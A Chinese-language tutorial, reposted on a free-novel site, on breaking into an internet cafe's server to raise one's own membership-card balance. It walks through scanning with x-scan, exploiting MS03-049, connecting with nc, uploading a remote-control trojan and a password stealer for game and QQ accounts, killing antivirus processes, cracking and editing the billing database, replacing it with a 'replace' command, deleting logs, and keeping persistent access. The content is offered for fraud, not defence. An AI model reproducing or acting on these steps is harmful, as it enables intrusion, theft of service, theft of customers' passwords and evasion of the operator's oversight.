  在proxy handing下第一个框前打勾
  在试试吧!
  呵呵~~~书包网 txt小说上传分享
网吧漏洞-自己加会员卡,丰衣足食
过免费网吧上网的一些动画教程、工具,其实用杀万象进程的方法并不好,网管不是傻瓜,看到你的机器没计时你却坐在上面玩,这样你恐怕也不自在吧~!
  今天我就详细的为大家讲解一下具体的加卡过程,再不会的就没办法了。
  人无完人,任何事情都一样,操作系统也有打不完的补丁,基本上没哪个网吧防范得很好,比较“牛B”的网管会用WINDOWS98,那就只有在别的地方想办法获取权限了。
  不说废话了,下面开始:
  经过x-scan扫描主机有很多漏洞(不会的网上有很多教程,看一下就懂了),但是我们选择ms03049进行溢出,即使主机装了防火墙也防不住“绕道走”式的攻击。下面进行溢出:
  OK,溢出成功了,我们再用NC正向连接1234端口,获得权限。
  下一步不用说,当然是用TFTP传木马,前提条件是木马是自己做的免杀,不然对方的杀毒软件会报病毒,nc就有可能会丢失连接信息。咱们传一个远程控制木马(这里用的是冰河,代表性)、一个密码记忆(截取网络游戏、QQ在线冲值卡密码)、一个winshell和小工具若干,呵呵。传的时候文件名改一下。
  查看一下主机进程:
  我们将PID为424,448,1136的进程杀掉,ccsetmgr、ccevtmgr、rtvscan分别的防火墙和杀毒软件。至于他本身还有什么病毒,懒得管了。
  看一下他的屏幕,在干什么东东:
  晕,杀毒软件又启动了,我又杀了几遍,不过每次都是过不了一分钟它自己就启动了,罢了,这也不妨碍我们的工作。
  我们最重要的任务别忘了,找到万象安装的路径(无论哪个网管计费软件都都数据库,步骤大同小异):
  这么多文件!?是的,我们只要,这个是会员卡的数据库,我们将它下载过来。然后用数据库编辑工具打开,提示需要密码。用Access PassView 选择即可破解密码。在我们拥有管理权限和密码之后,我们就可以进行编辑了:
  展开userlist:
  展开以后看到很多数据,会员卡号、密码、余额等信息都在里面,为了网吧安全,只给大家看到字段名。还等什么,找到自己的会员卡号,修改对应的remain字段的值,不要改得过大,20元以内就行了(不带单位),保存。修改好以后我们再覆盖过去吗?这样做就错了,直接覆盖对方的万象会无法响应导致死机,不会那么残忍吧?我们先传到C盘下,然后用replace命令替换对方正在使用中的万象数据库。
  命令格式: replace 新文件 旧文件路径
  这样就暗度陈仓地将我们修改好的数据库传过去了。不过别忘了删除日志:
  那下次要加会员卡怎么办呢?用冰河和winshell继续控制呗!
  要注意的问题:用数据库替换的方式并不是会员卡马上显示的就是你自己修改的余额,因为主机上的万象还没刷新,我们可以手动刷新:自己结帐下机,再重新登录会员卡就看到自己修改的余额了。书包网 txt小说上传分享
书包网所收录免费小说、书友评论、用户上传文字、图片等其他一切内容及书包网所做之广告均属用户个人行为,与书包网无关书包网所收录免费小说如有侵犯您的合法权益请在本站留言,书包网会在24小时之内删除您的作品。谢谢!Copyright &
Beta All Rights Reserved. 蜀ICP备号-1

我要回帖

更多关于 按键精灵随机输入字母 的文章

 

随机推荐